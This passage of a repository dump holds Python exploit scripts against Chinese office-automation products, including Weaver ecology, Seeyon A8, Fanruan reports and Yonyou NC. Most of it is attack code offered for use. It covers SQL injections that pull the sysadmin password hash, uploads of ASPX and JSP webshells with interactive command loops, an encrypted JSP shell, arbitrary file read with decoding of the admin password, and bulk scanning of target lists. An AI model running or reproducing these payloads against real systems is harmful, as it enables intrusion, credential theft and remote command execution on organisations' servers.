title() 42 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 43 | POC_1(target_url) 44 | -------------------------------------------------------------------------------- /泛微OA/ecology_test/ecology_sql.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import urllib3 4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 5 | 6 | print ''' 7 | ---------------------------------------- 8 | Ecology_SQL test script by LuckyEast >_< 9 | ---------------------------------------- 10 | ''' 11 | 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 15 | 'Accept-Language': 'zh-CN,zh;q=0.9', 16 | 'Content-Type': 'application/x-www-form-urlencoded' 17 | } 18 | 19 | def sql_test(url): 20 | vul_url = url + '/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333' 21 | poc = 
"formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a
%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 22 | rsp = requests.post(url=vul_url, data=poc, headers=headers, verify=False, timeout=10).text.strip() 23 | print rsp.encode('utf-8') 24 | 25 | if __name__ == "__main__": 26 | url = sys.argv[1] 27 | sql_test(url) 28 | -------------------------------------------------------------------------------- /智慧校园管理系统/exp.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import random 4 | import re 5 | import base64 6 | import time 7 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 8 | 9 | def title(): 10 | print('+------------------------------------------') 11 | print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') 12 | print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m') 13 | print('+ \033[34m公众号 : PeiQi文库 \033[0m') 14 | print('+ \033[34mVersion: 智慧校园管理系统 \033[0m') 15 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 16 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 17 | print('+------------------------------------------') 18 | 19 | def POC_1(target_url): 20 | vuln_url = target_url + "/DC_OA_WJG/Upload" 21 | headers = { 22 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 23 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryNxqOHxbHqt9mf7s5", 24 | } 25 | data = 
base64.b64decode("LS0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5TnhxT0h4YkhxdDltZjdzNQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVwRmlsZSI7IGZpbGVuYW1lPSJQZWlRaS5hc3B4IgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQoKPHNjcmlwdCBsYW5ndWFnZT0iSlNjcmlwdCIgcnVuYXQ9InNlcnZlciI+ZnVuY3Rpb24gUGFnZV9Mb2FkKCl7ZXZhbChSZXF1ZXN0WyJQZWlRaSJdLCJ1bnNhZmUiKTt9PC9zY3JpcHQ+CgotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlOeHFPSHhiSHF0OW1mN3M1LS0=") 26 | try: 27 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 28 | response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5) 29 | print("\033[36m[o] 正在请求 {}/DC_OA_WJG/Upload 尝试上传木马..... \033[0m".format(target_url)) 30 | if 'true' in response.text and 'path' in response.text and response.status_code == 200: 31 | print("\033[32m[o] 目标 {} 成功上传 Webshell文件\033[0m".format(target_url)) 32 | webshell_path = re.findall(r'"path":"(.*?)"', response.text)[0] 33 | print("\033[32m[o] Webshell文件地址: {}/{} \033[0m".format(target_url, webshell_path)) 34 | while True: 35 | Cmd = str(input("\033[35mCmd >>> \033[0m")) 36 | cmd_url = target_url + "/" + webshell_path + "?PeiQi=Response.Write(new%20ActiveXObject(%22WSCRIPT.Shell%22).exec(%22cmd%20/c%20{}%22).StdOut.ReadAll());".format(Cmd) 37 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 38 | response = requests.get(url=cmd_url, data=data, headers=headers, verify=False, timeout=5) 39 | print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) 40 | else: 41 | print("\033[31m[x] 目标 {} 上传Webshell文件失败\033[0m".format(target_url)) 42 | sys.exit(0) 43 | 44 | except Exception as e: 45 | print("\033[31m[x] 请求失败 \033[0m", e) 46 | 47 | 48 | if __name__ == '__main__': 49 | title() 50 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 51 | POC_1(target_url) 52 | -------------------------------------------------------------------------------- /帆软OA/帆软OA_V8_任意文件读取/poc.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | 6 | def title(): 7 | print('+------------------------------------------') 8 | print('+ \033[34mVersion: 帆软报表 v8.0 \033[0m') 9 | print('+ \033[36m使用格式: python3 poc.py \033[0m') 10 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 11 | print('+------------------------------------------') 12 | 13 | def decode_passwd(cipher): 14 | PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] # 掩码 15 | Password = "" 16 | cipher = cipher[3:] # 截断三位后 17 | for i in range(int(len(cipher) / 4)): 18 | c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16) 19 | c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] 20 | Password = Password + chr(c2) 21 | return Password 22 | 23 | def POC_1(target_url): 24 | vuln_url_1 = target_url + '/WebReport/ReportServer' 25 | vuln_url_2 = target_url + '/ReportServer' 26 | headers = { 27 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", 28 | } 29 | try: 30 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 31 | response_1 = requests.get(url=vuln_url_1, timeout=5, verify=False, headers=headers) 32 | response_2 = requests.get(url=vuln_url_2, timeout=5, verify=False, headers=headers) 33 | if "部署页面" in response_1.text: 34 | print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_1)) 35 | POC_2(vuln_url_1) 36 | elif "部署页面" in response_2.text: 37 | print("\033[32m[o] 目标部署页面为: {} \033[0m".format(vuln_url_2)) 38 | POC_2(vuln_url_2) 39 | else: 40 | print("\033[31m[x] 目标漏洞无法利用 \033[0m") 41 | sys.exit(0) 42 | 43 | except Exception as e: 44 | print("\033[31m[x] 目标漏洞无法利用 {} \033[0m".format(e)) 45 | sys.exit(0) 46 | 47 | def POC_2(vuln_url_fileread): 48 | vuln_url = vuln_url_fileread + "?op=chart&cmd=get_geo_json&resourcepath=privilege.xml" 49 | try: 50 | 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | response = requests.get(url=vuln_url, verify=False, timeout=5) 52 | print("\033[32m[o] 正在访问: {} \033[0m".format(vuln_url)) 53 | if "rootManagerPassword" in response.text and response.status_code == 200: 54 | print("\033[32m[o] 目标存在漏洞,读取敏感文件 \n{} \033[0m".format(response.text)) 55 | user_name = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerName>', response.text) 56 | cipher = re.findall(r'<!\[CDATA\[(.*?)]]></rootManagerPassword>', response.text) 57 | password = decode_passwd(cipher[0]) 58 | print("\033[34m[o] 后台账户密码为:{} {} \033[0m".format(user_name[0], password)) 59 | else: 60 | print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url)) 61 | except Exception as e: 62 | print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url)) 63 | 64 | if __name__ == '__main__': 65 | title() 66 | target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) 67 | POC_1(target_url) 68 | -------------------------------------------------------------------------------- /seeyon/致远OA组合getshell.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import time 3 | import requests 4 | import re 5 | import sys 6 | import random 7 | import zipfile 8 | 9 | 10 | la = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0', 11 | 'Content-Type': 'application/x-www-form-urlencoded'} 12 | 13 | def generate_random_str(randomlength=16): 14 | random_str = '' 15 | base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' 16 | length = len(base_str) - 1 17 | for i in range(randomlength): 18 | random_str += base_str[random.randint(0, length)] 19 | return random_str 20 | 21 | mm = generate_random_str(8) 22 | 23 | webshell_name1 = mm+'.jsp' 24 | webshell_name2 = '../'+webshell_name1 25 | 26 | def file_zip(): 27 | shell = 'test' ## 替换shell内容 28 | zf = zipfile.ZipFile(mm+'.zip', mode='w', 
compression=zipfile.ZIP_DEFLATED) 29 | zf.writestr('layout.xml', "") 30 | zf.writestr(webshell_name2, shell) 31 | 32 | 33 | def Seeyon_Getshell(urllist): 34 | 35 | url = urllist+'/seeyon/thirdpartyController.do' 36 | post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1" 37 | response = requests.post(url=url, data=post, headers=la) 38 | if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower(): 39 | cookie = response.cookies 40 | cookies = requests.utils.dict_from_cookiejar(cookie) 41 | jsessionid = cookies['JSESSIONID'] 42 | file_zip() 43 | print( '获取cookie成功---->> '+jsessionid) 44 | fileurl = urllist+'/seeyon/fileUpload.do?method=processUpload&maxSize=' 45 | headersfile = {'Cookie': "JSESSIONID=%s" % jsessionid} 46 | post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0', 47 | 'isEncrypt': "0"} 48 | file = [('file1', ('test.png', open(mm+'.zip', 'rb'), 'image/png'))] 49 | filego = requests.post(url=fileurl,data=post,files=file, headers=headersfile) 50 | time.sleep(2) 51 | else: 52 | print('获取cookie失败') 53 | exit() 54 | if filego.text: 55 | fileid1 = re.findall('fileurls=fileurls\+","\+\'(.+)\'', filego.text, re.I) 56 | fileid = fileid1[0] 57 | if len(fileid1) == 0: 58 | print('未获取到文件id可能上传失败!') 59 | print('上传成功文件id为---->>:'+fileid) 60 | Date_time = time.strftime('%Y-%m-%d') 61 | headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': "JSESSIONID=%s" % jsessionid} 62 | getshellurl = urllist+'/seeyon/ajax.do' 63 | data = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D' 64 | getshell = requests.post(url=getshellurl,data=data,headers=headersfile2) 65 | time.sleep(1) 66 | webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1 67 | shelllist = 
requests.get(url=webshellurl1) 68 | if shelllist.status_code == 200: 69 | print('利用成功webshell地址:'+webshellurl1) 70 | else: 71 | print('未找到webshell利用失败') 72 | 73 | 74 | 75 | def main(): 76 | if (len(sys.argv) == 2): 77 | url = sys.argv[1] 78 | Seeyon_Getshell(url) 79 | else: 80 | print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx") 81 | 82 | if __name__ == '__main__': 83 | main() 84 | -------------------------------------------------------------------------------- /seeyon/致远A8任意文件写入漏洞_getshell_exp/致远A8任意文件写入漏洞_getshell_exp.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import sys 3 | import requests 4 | 5 | def encode(origin_bytes): 6 | """ 7 | 重构 base64 编码函数 8 | """ 9 | # 将每一位bytes转换为二进制字符串 10 | base64_charset = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6" 11 | base64_bytes = ['{:0>8}'.format(bin(ord(b)).replace('0b', '')) for b in origin_bytes] 12 | 13 | resp = '' 14 | nums = len(base64_bytes) // 3 15 | remain = len(base64_bytes) % 3 16 | 17 | integral_part = base64_bytes[0:3 * nums] 18 | while integral_part: 19 | # 取三个字节,以每6比特,转换为4个整数 20 | tmp_unit = ''.join(integral_part[0:3]) 21 | tmp_unit = [int(tmp_unit[x: x + 6], 2) for x in [0, 6, 12, 18]] 22 | # 取对应base64字符 23 | resp += ''.join([base64_charset[i] for i in tmp_unit]) 24 | integral_part = integral_part[3:] 25 | 26 | if remain: 27 | # 补齐三个字节,每个字节补充 0000 0000 28 | remain_part = ''.join(base64_bytes[3 * nums:]) + (3 - remain) * '0' * 8 29 | # 取三个字节,以每6比特,转换为4个整数 30 | # 剩余1字节可构造2个base64字符,补充==;剩余2字节可构造3个base64字符,补充= 31 | tmp_unit = [int(remain_part[x: x + 6], 2) for x in [0, 6, 12, 18]][:remain + 1] 32 | resp += ''.join([base64_charset[i] for i in tmp_unit]) + (3 - remain) * '=' 33 | 34 | return resp 35 | def getshell(urls): 36 | url = urls + "/seeyon/htmlofficeservlet" 37 | headers = { 38 | "Pragma": "no-cache", 39 | "Cache-Control": "no-cache", 40 | "Upgrade-Insecure-Requests": "1", 41 | "User-Agent": "Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36", 42 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 43 | "Accept-Language": "zh-CN,zh;q=0.9", 44 | "Connection": "close", 45 | } 46 | file_name = encode('..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\checkload32.jsp') 47 | payload = """DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV\r 48 | OPTION=S3WYOSWLBSGr\r 49 | currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r 50 | CREATEDATE=wUghPB3szB3Xwg66\r 51 | RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r 52 | originalFileId=wV66\r 53 | originalCreateDate=wUghPB3szB3Xwg66\r 54 | FILENAME="""+file_name+"""\r 55 | needReadFile=yRWZdAS6\r 56 | originalCreateDate=wLSGP4oEzLKAz4=iz=66\r 57 | <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("zs".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce""" 58 | requests.post(url=url,data=payload,headers=headers) 59 | result = requests.get(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd+/c+echo+ZuoShou_Jsp_Shell") 60 | if 'ZuoShou_Jsp_Shell' in result.text : 61 | print(u'Jsp:Getshell成功\t{}'.format(urls + "/seeyon/checkload32.jsp?pwd=zs&cmd=cmd /c whoami")) 62 | else : 63 | print(u'Getshell失败') 64 | if __name__ == '__main__': 65 | if len(sys.argv)!=2 : 66 | print(u"\t\t用法:python poc.py 'http://loaclhost'") 67 | else: 68 | url = sys.argv[1] 69 | 
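        getshell(url)
--------------------------------------------------------------------------------
/用友OA/用友ERP-NC_目录遍历/poc.py:
--------------------------------------------------------------------------------
#/usr/bin/python3
'''
fofa app="用友-UFIDA-NC"
For testing only.
'''
import requests
import time
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def title():
    """Print the banner and usage hint for this checker."""
    print('+------------------------------------------')
    print('+ \033[34mVersion: 用友ERP-NC 目录遍历漏洞 \033[0m')
    print('+ \033[36m使用格式: python3 poc.py \033[0m')
    print('+ \033[36m文件名: url.txt \033[0m')
    print('+------------------------------------------')


# Random User-Agent
def get_ua():
    """Return a randomised Chrome-style User-Agent string.

    The major version is drawn from 55-62, the build from 0-3200 and the
    patch from 0-140; the platform token is one of three fixed choices.
    """
    major = random.randint(55, 62)
    build = random.randint(0, 3200)
    patch = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(major, build, patch)
    parts = ['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
             '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
    return ' '.join(parts)


def poc(url):
    """Check one host for the NCFindWeb directory-listing issue and record hits.

    A 200 response to the service URL with an empty ``filename`` is the only
    indicator used; matching targets are appended to ``success.txt``.

    NOTE(review): because just the status code is inspected, any endpoint that
    answers 200 is reported; checking the body for a listing would cut
    false positives.

    Args:
        url: Base URL including scheme, without trailing slash.
    """
    target_url = url + "/NCFindWeb?service=IPreAlertConfigService&filename="
    header = {"User-Agent": get_ua()}
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=target_url, headers=header, verify=False, timeout=10)
        if response.status_code == 200:
            with open('success.txt', 'a', encoding='utf8') as vul:
                vul.write("{} \n".format(target_url))
            print("\033[32m[+]目标 {} 存在用友ERP-NC 目录遍历漏洞 \033[0m".format(url))
        else:
            print("\033[31m[x]目标 {} 不存在用友ERP-NC 目录遍历漏洞 \033[0m".format(url))
    except Exception as e:
        # The original format string had no placeholder, so ``e`` was silently dropped.
        print("\033[31m[x] {} 请求失败 {} \033[0m".format(url, e))


def _normalize_url(line):
    """Strip surrounding whitespace from one input line and default the scheme to http://.

    The original stripped only ``\\n``, leaving ``\\r`` and spaces in the URL.
    """
    url = line.strip()
    if url[:4] != "http":
        url = "http://" + url
    return url


def _to_https(url):
    """Swap an ``http://`` prefix for ``https://``; other URLs are returned unchanged.

    The original used ``url.replace("http", "https")``, which turned an
    ``https://`` input into ``httpss://`` and rewrote "http" anywhere in the path.
    """
    if url.startswith("http://"):
        return "https://" + url[len("http://"):]
    return url


def _probe(url, header):
    """Return True when ``url`` answers HTTP 200; request errors propagate."""
    req = requests.get(url=url, headers=header, verify=False, timeout=10)
    return req.status_code == 200


def Scan(file_name):
    """Read targets from ``file_name`` (one per line) and run ``poc`` on each.

    Each target is fetched over http first; when that does not answer 200 the
    scheme is switched to https before ``poc`` runs, matching the original
    flow. Blank lines are skipped. Failures are printed and the scan moves on.

    Args:
        file_name: Path to a UTF-8 text file of hosts or URLs.
    """
    header = {"User-Agent": get_ua()}
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    with open(file_name, "r", encoding='utf8') as scan_url:
        for line in scan_url:
            if not line.strip():
                continue
            url = _normalize_url(line)
            try:
                try:
                    reachable = _probe(url, header)
                except Exception:
                    reachable = False
                if reachable:
                    print("\033[32m[+]正在请求{}".format(url))
                else:
                    # Retry over https; ``url`` keeps the https form for poc() below.
                    url = _to_https(url)
                    if _probe(url, header):
                        print("\033[32m[+]正在请求{}".format(url))
            except Exception as e:
                print("\033[31m[x] {} 访问失败 {} \033[0m".format(url, e))
            try:
                poc(url)
            except Exception as e:
                print("\033[31m[x] {} 请求报错 {} \033[0m".format(url, e))


if __name__ == '__main__':
    title()
    file_name = input("\033[35m请输入需要检测的文件名:\033[0m")
    Scan(file_name)
--------------------------------------------------------------------------------
/泛微OA/泛微OA_V8_SQL注入/weaverSQL.py:
--------------------------------------------------------------------------------
# Weaver OA V8 SQL injection check: reads the administrator (sysadmin) password hash (MD5).
# fofa: app="泛微-协同办公OA"

import requests
import urllib3
from multiprocessing import Pool
urllib3.disable_warnings()


def title():
    """Print the banner and usage hint for this checker."""
    print("[-------------------------------------------------]")
    print("[------------ 泛微OA V8 SQL注入 -----------]")
    print("[-------- usage:python3 weaverSQL.py ------]")
    print("[-------------------------------------------------]")


# Mobile Chrome User-Agent sent with every request.
headers = {
    "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
}

def 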
target_url(url): 22 | target_url = url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" 23 | try: 24 | res = requests.get(url=target_url,headers=headers,verify=False,timeout=10) 25 | if res.status_code == 200: 26 | print(f"\033[32m[+]目标系统: {url} 存在SQL注入!\033[0m") 27 | print("\033[32m[+] 正在查询sysadmin密码信息.......\033[0m") 28 | print(f"\033[32m[+]用户: sysadmin 密码MD5: {res.text.strip()}\033[0m") 29 | print("[---------------------------------------------------------------------]") 30 | with open('result.txt', 'a', encoding='utf8') as re: 31 | re.write("目标 {} 存在SQL注入\n用户名: sysadmin 密码MD5:{}\n\n".format(target_url,res.text.strip())) 32 | else: 33 | print(f"\033[31m[x]目标系统: {url} 不存在SQL注入!\033[0m") 34 | print("[---------------------------------------------------------------------]") 35 | except Exception as e: 36 | print(f"\033[31m[x]目标系统: {url} 存在未知错误!\033[0m\n",e) 37 | print("[---------------------------------------------------------------------]") 38 | 39 | def Scan(file_name): 40 | pool = Pool(processes=10) 41 | with open(file_name, "r", encoding='utf8') as scan_url: 42 | for url in scan_url: 43 | if url[:4] != "http": 44 | url = "http://" + url 45 | url = url.strip('\n') 46 | pool.apply_async(target_url, args=(url,)) 47 | pool.close() 48 | pool.join() 49 | try: 50 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 51 | httpError = False 52 | try: 53 | req = requests.get(url=url,headers=headers,verify=False,timeout=10) 54 | except Exception as e: 55 | httpError = True 56 | if not httpError and req.status_code == 200: 57 | print("\033[32m[+] 正在请求{} \033[0m".format(url)) 58 | else: 59 | url = url.replace("http","https") 60 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 61 | req = requests.get(url=url, headers=headers, verify=False, timeout=10) 62 | if req.status_code == 200: 63 | print("\033[32m[+] 正在请求{} \033[0m".format(url)) 64 | else: 65 | pass 66 | except Exception as e: 67 | 
print("\033[31m[x]"+url+" 访问失败 \033[0m".format(e)) 68 | else: 69 | pass 70 | try: 71 | target_url(url) 72 | except Exception as e: 73 | print("\033[31m[x] "+url+" 请求报错 \033[0m".format(e)) 74 | continue 75 | 76 | 77 | 78 | pool.close() 79 | pool.join() 80 | if __name__ == "__main__": 81 | title() 82 | file_name = str(input("\033[35m请输入需要测试的文件名: \033[0m")) 83 | Scan(file_name) 84 | 85 | -------------------------------------------------------------------------------- /泛微OA/泛微OA_V9_任意文件上传/exp.py: -------------------------------------------------------------------------------- 1 | #encoding: utf-8 2 | import requests 3 | import sys 4 | from time import time 5 | import random 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | 8 | def title(): 9 | print('+------------------------------------------') 10 | print('+ \033[34mVersion: 泛微OA V9 任意文件上传 \033[0m') 11 | print('+ \033[36m使用格式: python3 exp.py \033[0m') 12 | print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') 13 | print('+------------------------------------------') 14 | 15 | #随机ua 16 | def get_ua(): 17 | first_num = random.randint(55, 62) 18 | third_num = random.randint(0, 3200) 19 | fourth_num = random.randint(0, 140) 20 | os_type = [ 21 | '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', 22 | '(Macintosh; Intel Mac OS X 10_12_6)' 23 | ] 24 | chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num) 25 | 26 | ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', 27 | '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] 28 | ) 29 | return ua 30 | 31 | 32 | def POC_1(target_url): 33 | vuln_url_2 = target_url + "/page/exportImport/uploadOperation.jsp" 34 | print('\033[36m[+] 正在请求: {}'.format(vuln_url_2)) 35 | headers = { 36 | "User-Agent": get_ua(), 37 | "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc", 38 | "Connection": "close", 39 | "Content-Length": "500" 40 | } 41 | files = { 42 | 'file': 
('update.jsp','<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);out.print(666);}%><%out.print(666);%>','application/octet-stream') 43 | } 44 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 45 | response = requests.post(url=vuln_url_2, headers=headers, files=files, verify=False,timeout=10) 46 | test_webshell(target_url) 47 | 48 | 49 | def test_webshell(target_url): 50 | webshell_url = target_url + "/page/exportImport/fileTransfer/update.jsp" 51 | headers = {"User-Agent": get_ua()} 52 | try: 53 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 54 | response = 